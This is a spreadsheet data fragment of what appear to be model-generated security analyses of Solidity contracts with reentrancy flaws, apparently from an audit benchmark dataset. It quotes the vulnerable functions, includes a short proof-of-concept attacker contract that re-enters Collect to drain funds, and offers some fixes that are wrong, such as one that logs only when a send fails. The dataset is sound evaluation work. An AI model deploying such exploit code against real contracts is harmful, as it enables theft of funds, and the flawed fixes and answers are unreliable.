c. Implement a reentrancy guard. This is a mechanism to prevent a function from being called while it is already in the execution stack. This can be done by using a state variable that acts as a mutex. However, this should be used carefully as it can introduce other potential issues if not implemented correctly.</t>
  </si>
  <si>
    <t>Let's start by reading the provided Solidity code to understand its functionality.
The provided code seems to be for a contract named `BANK_SAFE` and another contract named `LogFile`. 
1. The `BANK_SAFE` contract has the following functionalities:
    * `SetMinSum`: Set the minimum sum.
    * `SetLogFile`: Set the log file (another contract).
    * `Initialized`: Mark the contract as initialized.
    * `Deposit`: Deposit ether to the contract.
    * `Collect`: Collect a specified amount of ether from the contract.
    * A fallback function that calls the `Deposit` function.
2. The `LogFile` contract:
    * Stores a history of messages.
    * `AddMessage`: Add a message to the history.
Let's now analyze if there are any reentrancy vulnerabilities:
1. **Reentrancy vulnerability check**: 
The most common place to look for a reentrancy vulnerability is in functions that send ether. The `Collect` function in `BANK_SAFE` uses the `call.value` method to send ether, which is a potential candidate for a reentrancy attack.
Looking closely, we see that the `Collect` function sends ether to the caller's address before updating the balance of the caller. This order of operations can allow a malicious contract to re-enter the `Collect` function before its balance is updated, potentially leading to a reentrancy attack.
Let's answer the provided questions based on this analysis.
1. Are there any reentrancy vulnerabilities?
   - **Yes.**
2. how this vulnerability can be exploited :
   - In the `Collect` function, the ether is sent to the caller using `msg.sender.call.value(_am)()` before updating the `balances[msg.sender]`. A malicious contract can exploit this by making a recursive call to the `Collect` function before the balance is updated, thereby draining more ether than they should be able to.
3. The business impact of these vulnerabilities in one sentence:
   - **The `Collect` function leads to potential loss of ether beyond the user's balance.**
4. The potential solutions of this vulnerability:
   - Reorder the operations in the `Collect` function to update the balance before sending the ether.
   - Use the `transfer` or `send` method to send ether, as they only forward a limited gas, making reentrancy attacks impossible. However, be aware of the potential pitfalls of these methods as well.
   - Implement checks-effects-interactions pattern. This means that you should first make all the necessary checks, then make all changes to your contract's state, and lastly interact with other contracts (like sending ether).
   - Consider using reentrancy guards, a pattern where you set a state variable while a function is being executed and only allow that function to be called again once execution is complete.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability exists in the line `if(msg.sender.call.value(_am)())`. The reentrancy vulnerability occurs when external contract calls are made before the state (in this case, `balances[msg.sender]`) is updated. An attacker can exploit this by recursively calling the `Collect` function before the first call completes, allowing them to withdraw more ether than they should.
3. The business impact of these vulnerabilities in one sentence:
The `Collect` function leads to unauthorized withdrawals due to reentrancy.
4. The potential solutions of this vulnerabilities:
a. Use the Checks-Effects-Interactions pattern, where you perform all external calls (interactions) at the end, after state changes (effects). This would mean moving the state update (`balances[msg.sender]-=_am;`) before the external call (`msg.sender.call.value(_am)()`).
b. Use the reentrancyGuard modifier, a common Solidity pattern, which prevents recursive calls by locking the function during execution.
c. Instead of directly sending funds with `call.value`, use the `transfer` or `send` functions, which are limited in the amount of gas they can forward, making reentrancy attacks more difficult. However, this is not a foolproof solution and the Checks-Effects-Interactions pattern is still recommended.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function WithdrawToHolder(address _addr, uint _wei) 
    public
    onlyOwner
    payable
    {
        if(Holders[_addr]&gt;0)
        {
            if(_addr.call.value(_wei)())
            {
                Holders[_addr]-=_wei;
            }
        }
    }</t>
  </si>
  <si>
    <t>Alright, I'll begin by examining the provided Solidity code to identify any potential vulnerabilities.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The code has a reentrancy vulnerability at the `WithdrawToHolder` function. This is evidenced by the comment in the code indicating vulnerability at line 94. In the `WithdrawToHolder` function, the contract sends Ether to an address before updating the balance (`Holders[_addr]`). This sequence allows for a potential reentrancy attack because the external call (`_addr.call.value(_wei)()`) is made before the state (`Holders[_addr]`) is updated.
3. The business impact of these vulnerabilities in one sentence:
The `WithdrawToHolder` function leads to potential asset theft via a reentrancy attack.
4. The potential solutions of this vulnerabilities:
- Update the state (`Holders[_addr]`) before making the external call.
- Use the "Checks-Effects-Interactions" pattern, which ensures that interactions (external calls) are the last thing to happen in a function.
- Consider using the `transfer` or `send` method instead of `call.value`, as they inherently guard against reentrancy by providing only a limited gas stipend. However, if there's a genuine reason to use `call`, always ensure state changes occur before the external call.
- Implement a reentrancy guard using a state variable to prevent recursive calls.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes**
2. how this vulnerability can be exploited :
    a. **Reentrancy Attack**: The function `WithdrawToHolder` is vulnerable to reentrancy attacks because it calls an external address (`_addr.call.value(_wei)()`) before updating the state of `Holders[_addr]`.
    b. **Unchecked Return Value**: The return value of the `_addr.call.value(_wei)()` is not checked, although it's used in a conditional. If the call fails (returns false), the state is not updated, but there is no mechanism to handle this scenario.
3. The business impact of these vulnerabilities in one sentence:
    a. **Reentrancy Attack**: An attacker can repeatedly call the `WithdrawToHolder` function before its state is updated, leading to the potential draining of funds.
    b. **Unchecked Return Value**: In the event of a failed transaction, the contract state remains unchanged, potentially leading to loss or locking of funds.
4. The potential solutions of these vulnerabilities:
    a. **Reentrancy Attack**: Update the state (`Holders[_addr]`) before making the external call. This ensures that even if the function is re-entered, the state is already updated, preventing multiple withdrawals.
    b. **Unchecked Return Value**: Implement proper error handling for failed transactions. This could include emitting an event or using the newer Solidity `transfer` or `send` functions which throw an exception if the call fails.</t>
  </si>
  <si>
    <t>Alright, let's begin by reading the provided Solidity code to understand its structure and functionality.
Let's analyze the provided Solidity code:
1. The code starts with a contract `Ownable` that manages ownership of the contract. There is a function to change ownership and confirm ownership.
2. There's a `Token` contract which is an extension of `Ownable` and has a function to withdraw tokens.
3. Lastly, the `TokenBank` contract is an extension of the `Token` contract. It provides functionalities for depositing ether and withdrawing tokens or ether to holders.
To answer your question about reentrancy vulnerabilities:
1. Are there any reentrancy vulnerabilities?
Let's first provide a short answer to this question based on a preliminary review of the code.
1. **Are there any reentrancy vulnerabilities?**
   - Not sure.
Given the positive identification, let's now provide details on the vulnerability:
2. **how this vulnerability can be exploited :**
   - The reentrancy vulnerability exists in the `WithdrawToHolder` function. Specifically, the contract sends ether to an external address using the `.call.value()` method. This method can execute fallback functions in the receiving contract, allowing for recursive calls back to the `WithdrawToHolder` function before the state (in this case, `Holders[_addr]`) is updated. This can allow an attacker to repeatedly withdraw more funds than they should.
3. **The business impact of these vulnerabilities in one sentence:**
   - The `WithdrawToHolder` function leads to potential theft of ether from the contract.
4. **The potential solutions of this vulnerability:**
   - Update the state (i.e., `Holders[_addr]`) before sending ether. This prevents the possibility of reentrancy since even if a recursive call is made, the balance would have already been updated.
   - Use the `transfer` or `send` method instead of the `.call.value()` method to send ether, as they have a gas stipend limit which prevents the execution of fallback functions. However, this is not a foolproof solution and updating the state before sending is a better practice.
   - Implement a reentrancy guard, which is a pattern that prevents a function from being called while it's already in the middle of execution. This can be achieved by using a state variable like `bool private locked = false;` and checking/updating this state in critical functions.</t>
  </si>
  <si>
    <t>1. **Yes**, there is a reentrancy vulnerability in the code.
2. **how this vulnerability can be exploited :**
   The vulnerability exists in the `WithdrawToHolder` function. The sequence of events is:
   - The function checks if the holder has a balance greater than 0: `if(Holders[_addr]&gt;0)`.
   - It then tries to send `_wei` amount of ether to the `_addr` using the `call.value` method.
   - Only after the ether is successfully sent, the balance of the holder is reduced: `Holders[_addr]-=_wei;`.
   The `call.value` method transfers control to the recipient address, allowing it to execute arbitrary code. If the recipient address (i.e., `_addr`) is a malicious smart contract, it can call `WithdrawToHolder` again before the original call has finished, causing a reentrant execution. This can be repeated until the contract's balance is drained.
3. **The business impact of these vulnerabilities in one sentence:** 
   The `WithdrawToHolder` function leads to unauthorized withdrawals due to a reentrancy attack.
4. **The potential solutions of this vulnerability:**
   - **Update the state before transferring funds**: This is the most common and straightforward way to prevent reentrancy attacks. The contract should update the `Holders[_addr]` balance before transferring any ether. By doing this, even if a reentrant call is attempted, the balance will already be reduced, preventing further withdrawals.
   - **Use the `transfer` or `send` methods instead of `call.value`**: The `transfer` and `send` methods are safer alternatives for transferring ether as they have a gas stipend limit, making reentrancy attacks more challenging. However, note that these methods might not be suitable in all scenarios since they have limitations.
   - **Use a reentrancy guard**: Implement a reentrancy guard pattern in the contract. This involves using a state variable (e.g., `bool locked = false;`) that checks if the contract is currently executing a function. If the function is being executed, any subsequent calls will be rejected until the first call is completed.
   Here's a quick fix using the first solution (updating the state before transferring funds):
   ```solidity
   function WithdrawToHolder(address _addr, uint _wei) 
   public
   onlyOwner
   payable
   {
       require(Holders[_addr] &gt;= _wei, "Insufficient balance");
       // Deduct the balance first to prevent reentrancy
       Holders[_addr] -= _wei;
       // Then send the ether
       (bool success,) = _addr.call{value: _wei}("");
       require(success, "Transfer failed");
   }
   ``` 
   This modification ensures that the user's balance is deducted before any ether is sent, preventing the possibility of reentrancy.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function Collect(uint _am)
    public
    payable
    {
        var acc = Acc[msg.sender];
        if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
        {
            if(msg.sender.call.value(_am)())
            {
                acc.balance-=_am;
                LogFile.AddMessage(msg.sender,_am,"Collect");
            }
        }
    }</t>
  </si>
  <si>
    <t>Alright, I'll start by reading the provided Solidity code to understand its structure and functionality. After that, I'll analyze it for any vulnerabilities as per your request.
Thank you for providing the code. Here's the analysis:
1. **Are there any vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - **Reentrancy Attack:** The `Collect` function is vulnerable to a reentrancy attack. Specifically, the line `if(msg.sender.call.value(_am)())` sends ether to the caller's address without first reducing the balance. An attacker could create a malicious fallback function in their contract to repeatedly call the `Collect` function, draining the contract of its funds.
   - **Use of outdated Solidity version:** The code uses `pragma solidity ^0.4.25;` which is an outdated version of Solidity. This version might have known vulnerabilities.
   - **Use of the `var` keyword:** The use of the `var` keyword (e.g., `var acc = Acc[msg.sender];`) is deprecated in newer versions of Solidity. It infers the type from the first assignment, which can lead to unexpected behaviors.
3. **The business impact of these vulnerabilities in one sentence:**
   - Reentrancy vulnerability in the `Collect` function leads to potential theft of contract funds.
4. **The potential solutions of these vulnerabilities:**
   - **For Reentrancy Attack:**
     - Update the user's balance _before_ sending the funds.
     - Use the `reentrancyGuard` modifier or similar pattern to prevent recursive calls.
   - **For outdated Solidity version:**
     - Upgrade to the latest stable version of Solidity and ensure that all the features used in the code are compatible with the newer version.
   - **For the use of `var`:**
     - Explicitly specify the variable type instead of using `var`.
Would you like more detailed explanations or any other assistance?</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
   - **Reentrancy Attack**: The `Collect` function has a classic reentrancy vulnerability. The external call `msg.sender.call.value(_am)()` sends funds to the `msg.sender` address before updating the internal balance (`acc.balance-=_am;`). An attacker can exploit this by causing the `Collect` function to be recursively called before the internal balance is updated.
   - **Use of `var` keyword**: The `var` keyword is deprecated in newer versions of Solidity due to type inference issues. Using `var` can lead to unintended behavior if the inferred type is not what the developer expected.
   - **Use of `now` keyword**: The `now` keyword is an alias for `block.timestamp`, which can be manipulated by miners to a certain degree. Depending on the use-case, this might introduce vulnerabilities.
3. The business impact of these vulnerabilities in one sentence:
   - **Reentrancy Attack**: The `Collect` function leads to fund theft by exploiting the reentrancy vulnerability.
   - **Use of `var` keyword**: The `var` keyword can lead to unexpected behaviors and potential loss of funds.
   - **Use of `now` keyword**: Miners can manipulate the `now` keyword, potentially affecting the logic of the contract.
4. The potential solutions of these vulnerabilities:
   - **Reentrancy Attack**: Always update the internal state before making external calls. In this case, `acc.balance-=_am;` should be moved before the external call.
   - **Use of `var` keyword**: Avoid using the `var` keyword. Instead, explicitly declare the type of the variable.
   - **Use of `now` keyword**: If precision is critical, consider other mechanisms for timekeeping or be aware of the potential risks associated with `block.timestamp`.</t>
  </si>
  <si>
    <t>First, I'll read the contents of the provided Solidity code file and then analyze it to answer your questions.
Here's the analysis based on the provided Solidity code:
### Code Overview:
1. The code defines two contracts: `U_BANK` and `Log`.
2. The `U_BANK` contract has functions `Put`, `Collect`, a fallback function, and some state variables and a struct to manage account information.
3. The `Log` contract is used to log messages and has a function `AddMessage` and some state variables to manage the log history.
### 1. Are there any reentrancy vulnerabilities?
**Answer:** Yes.
### 2. how this vulnerability can be exploited :
The reentrancy vulnerability is present in the `Collect` function of the `U_BANK` contract:
```solidity
if(msg.sender.call.value(_am)())
{
    acc.balance-=_am;
    LogFile.AddMessage(msg.sender,_am,"Collect");
}
```
In the code snippet, the contract sends ether to the `msg.sender` before updating the internal balance of the account (`acc.balance`). A malicious actor could exploit this to re-enter the `Collect` function before the balance is updated, effectively draining more ether than they should be able to.
### 3. The business impact of these vulnerabilities in one sentence:
The `Collect` function leads to potential ether theft due to reentrancy.
### 4. The potential solutions of these vulnerabilities:
1. Update the internal state (`acc.balance-=_am;`) before transferring ether to the `msg.sender`.
2. Use the `transfer` or `send` function instead of the `call.value()()` method to send ether, as they have a gas stipend that limits the called contract's ability to perform other actions.
3. Implement a reentrancy guard, a commonly used pattern to prevent recursive calls.
Would you like further details or any other assistance?</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The vulnerability lies in the following lines:
```
if(msg.sender.call.value(_am)())
{
    acc.balance-=_am;
    LogFile.AddMessage(msg.sender,_am,"Collect");
}
```
The reentrancy vulnerability occurs because the contract sends Ether (`msg.sender.call.value(_am)()`) before updating the internal balance of the user (`acc.balance-=_am`). This means that during the external call (`msg.sender.call.value(_am)()`), the recipient contract (if it's malicious) can reenter the `Collect` function and try to withdraw again, as the internal balance hasn't been updated yet.
3. The business impact of these vulnerabilities in one sentence:
The `Collect` function leads to unauthorized multiple withdrawals due to a reentrancy attack.
4. The potential solutions of these vulnerabilities:
- **Update the internal state before external calls**: This is the golden rule to avoid reentrancy attacks. In this context, you should subtract the amount from the internal balance before making the external call. The updated function would look like:
```solidity
function Collect(uint _am)
public
payable
{
    var acc = Acc[msg.sender];
    if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
    {
        acc.balance-=_am; // Update internal balance first
        if(msg.sender.call.value(_am)())
        {
            LogFile.AddMessage(msg.sender,_am,"Collect");
        }
        else
        {
            acc.balance+=_am; // If the send fails, revert the deduction
        }
    }
}
```
- **Use the `transfer` or `send` methods instead of `call.value()()`:** These methods are safer alternatives for sending Ether because they limit the gas that can be used by the receiving contract, making reentrancy attacks much harder.
- **Consider using mutexes (like a reentrancy guard)**: Mutexes ensure that a function cannot be reentered while it's already being executed. This pattern can be used to prevent reentrancy but can be a bit overkill for simple use cases. 
Always remember that the best security practices involve not just fixing issues but also understanding the root causes, so you can avoid similar mistakes in the future.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol</t>
  </si>
  <si>
    <t>Alright, I'll start by reading the provided Solidity code to understand its structure and functionality. Afterward, I will proceed with the analysis based on the format you provided. Let's begin.
From the initial look at the code, I observe a Solidity contract named "PrivateDeposit". This contract appears to have functionalities related to deposits, balance management, and a logging mechanism. I will now analyze the provided code for vulnerabilities as per the format you provided.
1. Are there any vulnerabilities?
Let's proceed with the analysis.
Based on my understanding of the provided Solidity code, here's the vulnerability assessment:
1. Are there any vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
   - **Use of `tx.origin`**: The code uses `tx.origin` in the `onlyOwner` modifier (`require(tx.origin == owner);`). This can lead to potential vulnerabilities because `tx.origin` refers to the original sender of a transaction, which might be different from the current message sender (`msg.sender`). Attackers can exploit contracts that call into this contract to bypass the `onlyOwner` check.
   - **Reentrancy attack**: In the `CashOut` function, the contract sends ether before updating the balance (`if(msg.sender.call.value(_am)())`). This order of operations can make the contract susceptible to reentrancy attacks.
   - **Lack of event emission**: It's not directly a vulnerability, but the contract does not emit events for significant state changes, making it harder for external observers to track contract actions.
3. The business impact of these vulnerabilities in one sentence:
   - **Use of `tx.origin`**: The `tx.origin` check allows unauthorized actions by external contracts.
   - **Reentrancy attack**: The `CashOut` function may lead to unauthorized withdrawal of funds.
   - **Lack of event emission**: Lack of transparency and traceability for external systems monitoring the contract.
4. The potential solutions to these vulnerabilities:
   - **Use of `tx.origin`**: Replace `tx.origin` with `msg.sender` to ensure that only the contract owner can call the restricted functions.
   - **Reentrancy attack**: Update the user balance before sending ether to prevent reentrancy. Alternatively, use the checks-effects-interactions pattern and consider adding a reentrancy guard.
   - **Lack of event emission**: Add event emissions for significant state changes to improve contract transparency and traceability.
It's essential to perform a comprehensive audit by a professional Solidity developer or firm to ensure the security of your smart contracts, especially if they handle real-world assets or funds.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability lies in the order of operations in the `CashOut` function. Specifically:
- The code sends the Ether (`msg.sender.call.value(_am)()`) before updating the `balances` mapping. This can lead to a reentrancy attack.
3. The business impact of these vulnerabilities in one sentence:
The reentrancy vulnerability in the `CashOut` function leads to potential theft of Ether.
4. The potential solutions of these vulnerabilities:
- Update the `balances` mapping before sending the Ether.
- Use the `Checks-Effects-Interactions` pattern to ensure state changes (like balance updates) happen before external calls.
- Consider using the `reentrancyGuard` modifier, which is a common pattern in Solidity to prevent reentrancy attacks.
Corrected code:
```solidity
function CashOut(uint _am)
{
    if(_am &lt;= balances[msg.sender])
    {            
        balances[msg.sender] -= _am; // Update the balance first
        if(msg.sender.call.value(_am)()) 
        {
            TransferLog.AddMessage(msg.sender, _am, "CashOut");
        }
        else
        {
            balances[msg.sender] += _am; // Revert the balance if the transfer fails
        }
    }
}
```
Note: While the above corrections address the reentrancy issue, careful and comprehensive testing should be done to ensure that the function behaves as expected and no new vulnerabilities are introduced.</t>
  </si>
  <si>
    <t>Let's start by examining the provided Solidity code to check for any potential reentrancy vulnerabilities.
1. Are there any reentrancy vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
The vulnerability is present in the `CashOut` function. Specifically, the contract sends Ether to an address before subtracting the value from the balance:
```
if(msg.sender.call.value(_am)())  // Sending Ether
{
    balances[msg.sender]-=_am;   // Subtracting from balance
    TransferLog.AddMessage(msg.sender,_am,"CashOut");
}
```
This ordering allows for reentrancy. If the `msg.sender` is a malicious contract, it can call `CashOut` again before the balance is updated, leading to multiple withdrawals.
3. The business impact of these vulnerabilities in one sentence:
The `CashOut` function leads to multiple unauthorized withdrawals.
4. The potential solutions to these vulnerabilities:
- Update the balance before sending Ether. The correct order should be to first subtract the amount from the user's balance, then send the Ether.
- Use the `reentrancyGuard` modifier or a similar solution to prevent recursive calls.
- Update the contract to use Solidity's `transfer` or `send` methods, which limit the amount of gas forwarded and make certain types of reentrancy attacks harder.
Let me demonstrate how the code should look to prevent the vulnerability.
I've made modifications to the `CashOut` function to prevent the reentrancy vulnerability:
```solidity
function CashOut(uint _am)
{
    if(_am&lt;=balances[msg.sender])
    {            
        balances[msg.sender]-=_am;
        if(!msg.sender.send(_am))
        {
            balances[msg.sender]+=_am;  // Revert in case of failure
            TransferLog.AddMessage(msg.sender,_am,"CashOut");
        }
    }
}
```
By updating the balance before sending the Ether and reverting the balance if the send operation fails, the risk of a reentrancy attack is mitigated. This approach ensures that even if a recursive call is attempted, the user's balance will already have been decremented, preventing multiple withdrawals.
However, please note that this is one way to address the issue. A thorough security review and testing are essential before deploying any contract changes.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability exists in the line:
```solidity
if(msg.sender.call.value(_am)())
```
This line sends ether to the `msg.sender` address. If `msg.sender` is a contract, it can implement a fallback function that calls the `CashOut` function again before the previous call completes. Since the balance isn't updated until after this line, this allows the contract to withdraw more than its balance.
3. The business impact of these vulnerabilities in one sentence:
The `CashOut` function leads to the potential draining of all contract funds.
4. The potential solutions of this vulnerabilities:
a) Update the balance before sending the ether:
```solidity
balances[msg.sender] -= _am;
if(!msg.sender.call.value(_am)()) {
    balances[msg.sender] += _am;
}
```
b) Use the `transfer` or `send` functions instead of `call.value` as they are safer against reentrancy attacks:
```solidity
balances[msg.sender] -= _am;
msg.sender.transfer(_am);
```
c) Implement a reentrancy guard using a mutex. This would involve using a state variable (e.g., `bool private locked = false;`) to ensure that the function cannot be recursively called.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol</t>
  </si>
  <si>
    <t>Let's start by reading and analyzing the provided Solidity code.
Analyzing the provided Solidity code, we can make the following observations:
1. **Contract W_WALLET**:
    - Contains functions `Put`, `Collect`, a fallback function, a constructor, a structure `Holder`, a mapping `Acc`, a variable `LogFile`, and a variable `MinSum`.
    - In the `Put` function, there's a dynamic allocation of the balance and unlocking time for each user.
    - The `Collect` function is designed to allow users to collect their funds. A crucial aspect to note is the use of `msg.sender.call.value(_am)()`, which is a low-level call to transfer Ether.
    - The fallback function delegates to the `Put` function with an `unlockTime` of 0.
2. **Contract Log**:
    - Maintains a log of messages in the `History` array.
    - The `AddMessage` function is used to add a new message to this log.
Based on this understanding, let's address the user's questions:
1. Are there any vulnerabilities?
1. Are there any vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
- **Reentrancy Attack:** The function `Collect` uses a low-level call (`msg.sender.call.value(_am)()`) to transfer Ether. This can make the contract vulnerable to a reentrancy attack because the Ether is transferred before updating the internal state (`acc.balance-=_am;`). An attacker can make a recursive call back to the `Collect` function before `acc.balance` is decremented, allowing them to drain more Ether than they should.
- **Variable Shadowing:** The `var` keyword is used in the function `Put` and `Collect`. This is deprecated and can lead to variable shadowing, potentially causing unexpected behaviors.
- **Gas Limit Issues with Logging:** The `AddMessage` function in the `Log` contract pushes data into the `History` array. If the `History` array grows too large, operations involving this array can run into gas limit issues. Moreover, continuously growing storage is an anti-pattern in Ethereum, as it becomes costly.
3. The business impact of these vulnerabilities:
- **Reentrancy Attack:** Unauthorized withdrawals can lead to financial losses.
- **Variable Shadowing:** Unexpected behaviors can compromise contract integrity.
- **Gas Limit Issues with Logging:** Growing costs for operations and potential failures due to gas limits.
4. The potential solutions for these vulnerabilities:
- **Reentrancy Attack:** Always update the contract's state before transferring Ether. The withdrawal pattern should be used: subtract the amount from the user's balance first, and then send the Ether.
- **Variable Shadowing:** Avoid using the `var` keyword. Instead, always declare the variable type explicitly.
- **Gas Limit Issues with Logging:** Consider using events for logging instead of pushing every message to an array. This way, the data is still accessible, but it doesn't require storage on the blockchain, thus reducing costs. If on-chain storage is necessary, consider implementing pagination or other mechanisms to limit the size of the array.</t>
  </si>
  <si>
    <t>"1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
   - Re-entrancy Attack: The function uses `msg.sender.call.value(_am)()` to send ether, which is susceptible to a re-entrancy attack.
   - Use of `var`: The use of `var` for type inference is deprecated and can lead to unexpected behavior.
   - Unsafe Ordering of Operations: The balance `acc.balance` is updated after the external call, which can be exploited.
   - Lack of event emission: The function does not emit events for important state changes, which can be problematic for tracking and auditing.
3. The business impact of these vulnerabilities in one sentence:
   - Re-entrancy Attack: The `Collect` function leads to unauthorized withdrawal of funds.
   - Use of `var`: Deprecated usage can cause unexpected issues and makes the code harder to maintain.
   - Unsafe Ordering of Operations: This could allow an attacker to drain more funds than they should be able to.
   - Lack of event emission: Makes it difficult to audit or track transactions.
4. The potential solutions to these vulnerabilities:
   - Re-entrancy Attack: Use the Checks-Effects-Interactions pattern, and consider using `reentrancyGuard` or similar mechanisms.
   - Use of `var`: Explicitly specify the variable type instead of using `var`.
   - Unsafe Ordering of Operations: Update the `acc.balance` before making the external call.
   - Lack of event emission: Emit events that log important state changes."</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
   - Yes
2. how this vulnerability can be exploited :
   - The `Collect` function is vulnerable to reentrancy attacks. The function updates the user's balance (`acc.balance`) after transferring the funds (`msg.sender.call.value(_am)()`), leaving a window for reentrancy.
3. The business impact of these vulnerabilities in one sentence:
   - The `Collect` function leads to unauthorized withdrawal of funds, which could deplete the contract's balance.
4. The potential solutions for these vulnerabilities:
   - Use the Checks-Effects-Interactions pattern: First perform all the checks, then make the necessary state changes, and lastly interact with external contracts.
   - Update the user's balance before making the external call to send funds.
   - Use the `transfer` method instead of `call.value()` for sending Ether, as `transfer` throws an exception on failure, preventing reentrancy.
Here's an example to fix the `Collect` function using Checks-Effects-Interactions pattern:
```solidity
function Collect(uint _am)
public
{
    var acc = Acc[msg.sender];
    require(acc.balance &gt;= MinSum &amp;&amp; acc.balance &gt;= _am &amp;&amp; now &gt; acc.unlockTime, "Invalid operation");
    uint amountToSend = _am;
    acc.balance -= amountToSend;  // Effects
    msg.sender.transfer(amountToSend);  // Interactions
}
```
By making these changes, you can mitigate the risk of reentrancy attacks.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
The function `Collect` is vulnerable to a reentrancy attack because it makes an external call (`msg.sender.call.value(_am)()`) before updating the internal state (`acc.balance-=_am;`). An attacker can re-enter the `Collect` function by calling it from within their fallback function when the `msg.sender.call.value(_am)()` line is executed.
Here is a proof of concept using a malicious contract:
```solidity
pragma solidity ^0.4.25;
contract Malicious {
    VulnerableContract public victim;
    constructor(address _victim) public {
        victim = VulnerableContract(_victim);
    }
    function attack(uint _am) public {
        victim.Collect(_am);
    }
    function () external payable {
        if (address(victim).balance &gt;= msg.value) {
            victim.Collect(msg.value);
        }
    }
}
```
3. The business impact of these vulnerabilities in one sentence:
The `Collect` function leads to unauthorized withdrawal of funds from the smart contract.
4. The potential solutions for these vulnerabilities:
- Use the "Checks-Effects-Interactions" pattern: Update the contract state before making external calls.
- Use Solidity's `transfer` function, which forwards only a limited amount of gas, making reentrancy attacks much more difficult.
Here is a safer version of the `Collect` function:
```solidity
function Collect(uint _am)
public
payable
{
    var acc = Acc[msg.sender];
    if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
    {
        acc.balance-=_am; // Update state first
        msg.sender.transfer(_am); // Then make the external call
        LogFile.AddMessage(msg.sender,_am,"Collect");
    }
}
```
By following these solutions, you can mitigate the risk of reentrancy attacks.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function CashOut(uint _am)
    public
    payable
    {
        if(_am&lt;=balances[msg.sender])
        {
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                TransferLog.AddMessage(msg.sender,_am,"CashOut");
            }
        }
    }</t>
  </si>
  <si>
    <t>### Analysis
#### 1. Are there any vulnerabilities?
Yes
#### 2. Proof of Concept of these vulnerabilities:
1. **No Reentrancy Protection**: The `Deposit()` function updates the `balances` mapping after calling an external contract `TransferLog.AddMessage()`. This opens the door for a reentrancy attack if the `Log` contract's `AddMessage` function is malicious.
    ```solidity
    function Deposit()
    public
    payable
    {
        if(msg.value &gt; MinDeposit)
        {
            // Vulnerable to reentrancy as it's calling an external contract before updating the state
            TransferLog.AddMessage(msg.sender,msg.value,"Deposit");
            balances[msg.sender]+=msg.value;
        }
    }
    ```
2. **Not Checking for Overflow**: The line `balances[msg.sender]+=msg.value;` doesn't check for overflow. Though overflow is unlikely due to the constraints of Ethereum, it's still a good practice to check.
    ```solidity
    balances[msg.sender]+=msg.value;
    ```
#### 3. The Business Impact of These Vulnerabilities:
1. Lack of reentrancy protection leads to potential asset loss from the contract.
2. Not checking for overflow could lead to incorrect balance accounting, though this is less likely.
#### 4. The Potential Solutions of These Vulnerabilities:
1. **For Reentrancy Protection**:
    - Use a reentrancy guard or update the state before making external calls.
    ```solidity
    // Adding a reentrancy guard
    bool internal locked = false;
    function Deposit() public payable {
        require(!locked, "Reentrant call detected!");
        locked = true;
        // Existing code
        locked = false;
    }
    ```
2. **For Overflow**:
    - Use SafeMath library for arithmetic operations to prevent overflow.
    ```solidity
    // Using SafeMath
    balances[msg.sender] = balances[msg.sender].add(msg.value);
    ```
Both issues should be addressed to secure the contract.</t>
  </si>
  <si>
    <t xml:space="preserve">1. Are there any vulnerabilities?
Yes.
2. how this vulnerability can be exploited :
- **Reentrancy Vulnerability**: Similar to the previous function, this function is also vulnerable to reentrancy attacks. It uses `msg.sender.call.value(_am)()` to send Ether, which allows the recipient to execute arbitrary code, potentially calling back into the contract before `balances[msg.sender]-=_am;` is executed.
  **Example Attack**:
  ```solidity
  contract Attacker {
    CashOut target;
</t>
  </si>
  <si>
    <t>"1. Are there any reentrancy vulnerabilities? 
Answer: Yes
2. how this vulnerability can be exploited :
The vulnerability exists in the `Deposit()` function. The function updates the `balances` mapping and then calls an external contract `TransferLog.AddMessage()`. An attacker can exploit this by making the `TransferLog` contract call back into the `ETH_VAULT` contract's `Deposit()` function, leading to reentrancy.
3. The business impact of these vulnerabilities in one sentence:
The `Deposit` function leads to reentrancy attacks, allowing attackers to manipulate the balance.
4. The potential solutions for these vulnerabilities:
- Use the Checks-Effects-Interactions pattern, where external calls are made after all the state changes.
- Use a reentrancy guard to prevent recursive calls.
Here's how you can modify the `Deposit` function to mitigate the vulnerability:
```solidity
// Add a reentrancy guard
bool private locked = false;
function Deposit()
    public
    payable
{
    // Reentrancy guard
    require(!locked, ""Reentrant call detected!"");
    locked = true;
    if(msg.value &gt; MinDeposit)
    {
        balances[msg.sender] += msg.value;
    }
    // External call after state change
